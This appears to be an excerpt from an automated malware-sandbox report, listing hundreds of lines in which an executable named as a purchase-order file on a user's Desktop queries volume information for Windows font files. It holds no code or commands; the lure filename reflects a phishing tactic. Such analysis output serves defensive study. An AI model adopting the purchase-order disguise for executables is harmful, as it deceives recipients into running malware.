          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
